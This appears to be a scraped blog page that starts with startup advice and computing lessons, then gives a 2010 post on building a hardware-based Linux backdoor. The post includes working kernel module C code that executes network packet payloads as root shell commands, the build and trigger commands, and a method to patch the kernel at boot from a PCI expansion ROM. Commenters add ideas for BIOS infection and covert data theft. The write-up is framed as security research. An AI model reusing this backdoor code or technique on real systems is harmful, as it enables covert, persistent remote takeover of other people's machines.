27. Work with people who are smarter than you at certain things.

28. Work with people who argue with you and tell you no.

29. Be willing to fight like hell during the day but still love each other when you go home.

30. Work with people who are passionate about solving the specific problem you are trying to solve. Passion for building a business is not enough; there needs to be passion for your customer and solving your customer’s problem.

31. Push the people around you to care as much as you do.

32. Be loyal. Cultivate and coach people vs. churning through them.

33. You’re never as right as you think you are.

34. Go to the gym and/or run at least 4 times per week. Keep your body in shape if you want to keep your mind in shape.

35. Don’t drink on airplanes unless you are on a flight of longer than 8 hours. It ruins you and wastes your time.

36. Choose your investors based on who you want to work with, be friends with, and get advice from.

37. Don’t choose your investors based on valuation. A couple of dilution points here or there wont matter in the long run but working with the right people will.

38. Raise as little money as possible when you first start. Force yourself to be budget constrained as it will cause you to carefully spend each dollar like it is your last.

39. Once you have some traction, raise more money than you need but not more than you know what to do with. This is tricky. Don’t skimp on fundraising because of dilution fears.

40. Spend every dollar like it is your last.

41. Know what kind of company you are trying to build. There are very few Googles and Facebooks. A good outcome for your business might be a $10M exit or a $20M exit or a $100M exit or no exit at all. Plan for the business you want to build. Don’t just shoot for the moon. From a money-in-your-pocket and return on time spent standpoint, owning 20% of a $20M exit in 2 years is much better than owning 3% of a $100M business in 5 years.

42. Related to #41, understand whether your business is a VC business or not. A VC business is expected to deliver 10x returns to investors. That means if you’re taking money with a $5M post-money valuation, the expectation is that you are building for a minimum $50M exit. $10M post-money valuation = $100M target. That’s not to say that you might not sell the company for less and everyone involved might be happy with that outcome, but that’s not what you are signing up for when you take VC money with such a valuation. Know what the implications of taking VC money are and what it means for expectations on you.

43. Make sure your personal business goals are aligned with the goals of your investors. The business will only succeed if you are motivated. Investors can’t force the business to succeed. And they certainly can’t force a CEO to care.

44. Conferences are generally a waste of time.

45. Smile. Laugh. Wear funny socks. I wear funny socks to remind myself to not settle for boring and to be creative.

46. Do something, anything that shows you’re not just a robot. Let people get to know the real you.

47. Hang a lantern on your hangups.

48. Wear your company’s t-shirts everywhere.

49. Do your own customer service.

50. Tell a good story.

51. But don’t lie. Ever.

52. Find inspiration in the people around you.

53. Have fun every single day. If it’s not fun, stop doing it. No one is making you.

54. It’s true what they say in sales, you’re only as good as your last sale.

55. Make mistakes, but learn from them. I’ve made hundreds.

56. Mature, but don’t grow up.

57. Never give up. Sphere: Related Content

30 lessons learned in computing over the last ten years

In looking at the last ten years of my life, I realized that I've learned many things. Mostly about how wrong I've been, and how stupid I've been. So, having looked at the 80+ projects I've worked on in the past ten years (excluding coursework, current start-ups, and graduate studies), I have reduced what I learned to a blog post. (In bullet format no-less).

- If you plan to write a programming language, then commit to every aspect. It is one thing to translate between languages; it is an entirely different effort to provide good error/warning messages, good developer tools, and to document an entirely different way of thinking. In writing Kira, I invented a whole new way to think about how to code, and while much of it was neat to me; some of it was very wrong and kinda stupid.

- Geometric computing is annoying, always use doubles. Never be clever with floats; floats will always let you down. Actually, never use floats.

- Lisp is the ultimate way to think, but don’t expect everyone to agree with you. Actually, most people will look at you as if you are crazy. The few that listen will revere you as a god that has opened their eyes to computing.

- If you plan on writing yet another Object Relational Mapper, then only handle row writing/transactions. Anything else will be wrong in the long term.

- If you want to provide students with a computer algebra system, then make sure they can input math equations into a computer first.

- Don’t build an IDE. Learn to use terminal and some text editor. If you need an IDE, then you are doing something wrong. When you master the terminal, the window environment will be cluttered with terminals and very few “applications”

- Learn UNIX, they had 99% of computing right. Your better way is most likely wrong at some level.

- Avoid XML, use JSON. Usage of text formats is a boon to expressiveness and the fact that computing has gotten cheap. Only use binary based serialization for games.

- If you plan to build an ORM to manage and upgrade your database, then never ever delete columns; please rename them.

- Never delete anything, mv it to /tmp

- Never wait for money to do anything; there is always a place to start.

- Optimize complexity after people use a feature and complain. Once they complain, you have a real complexity problem. I’ve had O(n^3) algorithms in products for years, and it didn’t matter because what they powered were not used.

- Text games can be fun too; if you want to write an MMO, then make a MUD. You can get users, and then you can use that to get traction to build something bigger. Develop rules and a culture.

- Don’t worry about concurrency in your database until you have real liabilities issues.

- Backup every day at the minimum, and test restores every week. If your restore takes more than 5 minutes of your time (as in time using the keyboard), then you did something wrong. If you can’t backup, then you have real issues and enough money to solve them with massive amounts of replicationg.

- Never write an IDE; it will always be a mistake. However, if you do make it, then realize most people don’t know that silver bullets don’t exist. You can easily sell it if you find the right sucker; this will of course become a part of your shame that you must own up when you die.

- JavaScript is now the required programming language for the web; get used to it. JavaScript is also going to get crazy fast once people figure out how to do need based type inference. Once JavaScript is uber, learn to appreciate the way it works rather than map your way of thinking to it.

- Master state machines, and you will master custom controls. Learn enough about finite state machines to be able to draw pictures and reason about how events coming into the machine affect the state.

- There is more value in learning to work in and around piles of crappy code than learning to make beautiful code; all code turns into shit given enough time and hands.

- If you want to build a spreadsheet program, then figure out how to extend Excel because Excel is god of the spreadsheet market.

- Write five games before writing a game engine.

- Debugging statistical applications is surprisingly difficult, but you can debug it by using R and checking the results with statistics.

- Don’t design the uber algorithm to power a product; instead figure out how to make a simple algorithm and then hire ten people to make the product uber.

- Learn to love Source Control. Backups are not enough. As you age, you will appreciate it more.

- Communicate to people more often, don’t stay in the cave expecting people will know your genius. At some point in your life, you will need to start selling your genius.

- Realizing that every product that exists solves some kind of problem. Rather than dismissing the product, find out more about the problem the product is trying to solve. Life is easier when you can look at new technology and find out that it does solve.

- Learn to be sold. Keep the business card of a good salesman. Sometimes, they actually have good products, but they are always useful.

- You can make developers do anything you want. Normal users on the other hand are not so masochistic.

- If you are debating between Build or Buy, then you should Build. You are debating which means you don’t know enough about it to make a sound decision. When you build, at least you will get something working before you find what to Buy and how to design with it.

- You will pay dearly for being prickly; learn to be goo and flexible to the changing world. Be water, my friend.

If you got to this point, then good job. The biggest thing I have learned (and probably the most painful) in the past ten years is how to deal with my ego. Ego is supposedly your best friend, but it also your worst enemy. Ego is a powerful force, but it isn't the right force to use. While I admit that I've used ego to push myself in very positive direction, I think I would have been better off if I didn't as the side effects trump the pros. Sphere: Related Content

31/10/10

Hosting backdoors in hardware

Posted in security on October 27th, 2010 by rwbarton – 12 Comments

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module
The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:
int exec_packet(struct sk_buff *skb)
{
char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
char *envp[1] = {NULL};

call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

kfree_skb(skb);
return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:
const struct net_protocol proto163_protocol = {
.handler = exec_packet,
.no_policy = 1,
.netns_ok = 1
};

int init_module(void)
{
return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let’s build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
CC [M] /home/rwbarton/exec163.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/rwbarton/exec163.mod.o
LD [M] /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:
rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.

Modifying the on-disk kernel
In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:
1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:
rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process
Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:
• The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
• The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
• The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
• GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
• GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
• The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
• The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

Comments (12)

AOrtega says:
October 27, 2010 at 1:07 pm
Great article.
I saw something similar in the paper “Implementing and Detecting a PCI Rootkit” by Heasman (http://www.blackhat.com/presentations/bh-dc-07/Heasman/Paper/bh-dc-07-Heasman-WP.pdf) and “PCI rootkits” by Lopes/Correa (http://www.h2hc.com.br/repositorio/2008/Joao.pdf) If my memory don’t fail me, they used INT 10h as the attack vector.
Finally, we suggested something similar on our own paper “Persistent BIOS Infection” (http://www.phrack.org/issues.html?issue=66&id=7) by using BIOS32 calls directly from the Kernel, but maybe your approach is more simple and effective.
However, I’m not sure if it’s correct to call this “backdoors in hardware”, as you are clearly modifying software or in the best case, firmware.
BTW, patching a gzipped binary like vmlinuz should be non-trivial. Any idea on how to make this simple?

Anonymous says:
October 27, 2010 at 5:00 pm
This is all very good and fine — but how does it deal with customized kernels? Or compressed vmlinux binaries? The kernel’s build system permits at least three kinds of compression already.

Kristian Hermansen says:
October 27, 2010 at 11:02 pm
Cool technique. I was at the first LEET conference in San Francisco where a guy presented a method of doing something similar by disabling protected memory space after the kernel was loaded (no need for BIOS hijacking).
http://www.usenix.org/event/leet08/tech/full_papers/king/king_html/

Atul Sovani says:
October 28, 2010 at 6:26 am
Hi, please excuse if it’s my poor understanding, but I think there is a mismatch between the sample code.
In the sample code given, the handler function is exec_packet(), whereas in struct net_protocol proto163_protocol, the handler is defined to be print_packet(). Shouldn’t that be exec_packet() instead?
Very good and informative article otherwise! Thanks for the great article!

Christian Sciberras says:
October 28, 2010 at 9:50 am
Nice read. Saw this being done with graphics cards. For those still thinking this is fiction, may I remind you about the batch of Seagate (I think?) harddisk infected with MBR virii?
Of course that worked differently.
Either case, think of this, who’s the major hardware manufacturer? The next time your silicon valley guy designs a new processor and tasks some Chinese people to do the manufacturing, how do you know that you’re getting what you think you are?
Oh, and there was the issue of the DoD and US Military using compromised (and/or fake) Cisco routers from cheap “gold” partners.
Indeed, if one does some research one might see how the battlefield in cyberwarfare is actually changing.

Peter da Silva says:
October 28, 2010 at 10:08 am
Next step, patching the firmware of a PCI card to include this hack by flashing it from a running system…

rwbarton says:
October 28, 2010 at 12:40 pm
Hi Atul,
Oops, you’re quite right–print_packet was accidentally left over from an older version of the code. I’ve corrected this mistake.

nerd says:
October 28, 2010 at 3:47 pm
Good explanation. But the difficulties are the huge amount of different Linux OS and different Graphic-cards, isn’t it? You must have a large library of several flashing progs for all of these cards – correct?

Kevin Marquette says:
October 29, 2010 at 12:44 pm
Nice write up. Just because it is hard to pull off today with all the different hardware and versions of Linux, people will find a way to make this easier and better.

Anonymous says:
October 29, 2010 at 3:33 pm
I can think of much better ways to do this off the top of my head. Why not infect the bootblock of the BIOS flash rom? The user can’t normally change this area of flash. An area of the flash chip can be protected from change, so a normal BIOS flash upgrade would not affect it. This area is normally used for bootstrapping, i.e. “QFlash” which can automatically read a bios update from floppy. Only a hardware signal WP can allow flash change. Simply touch a certain pin on the chip, install the spyware, now the system is permanently infected. Same flash chips are used across board vendors, and protection level varies by implementation, but it’s possible even some boards can be infected in pure software and consequently permanently locked down, so only a new flash chip could un-infect it.
See http://www.winbond-usa.com/products/winbond_products/pdfs/Memory/APNMNV07.pdffor a sample datasheet.
I can think of far nastier things too – can’t a rogue card on the PCI bus read any memory? Could you snoop on PCI transactions? What about the ASIC (ie another cpu on the board) that normally controls the overclocking functions etc., even if the CPU isn’t working? As for sending data, don’t use the normal internet – you can easily use Van Eck techniques to reliably send data with just software. What about hiding a bluetooth chip?
Anyone of you can now go off and develop such products – and I’m sure it’s all been done already, and just think a company in business 10 years has developed even the most advanced techniques, somewhere in the world it’s for sale right now. Many security products are advertised publically actually, however some countries have laws against such advertisements in public, so they have to use direct marketing.

Anonymous says:
October 29, 2010 at 3:40 pm
ps all you really need is the ability to read/write memory (and avoid normal memory protection mechanisms). I would make the backdoor the client and the host program can be a full fledged GUI with continual updates for various control functions for all major operating systems. Keyboard data and screengrabs would be two useful utilities based on the simplest of clients. Realtime video would need some high bandwidth, RF based communication however. But remember any tv/flatpanel is easily picked up with Van Eck (in the case of flatpanel, you receive a differntial signal so certain color schemes are more secure than others). Displayport was specifically designed with van eck in mind… and I think HDMI was too. Sphere: Related Content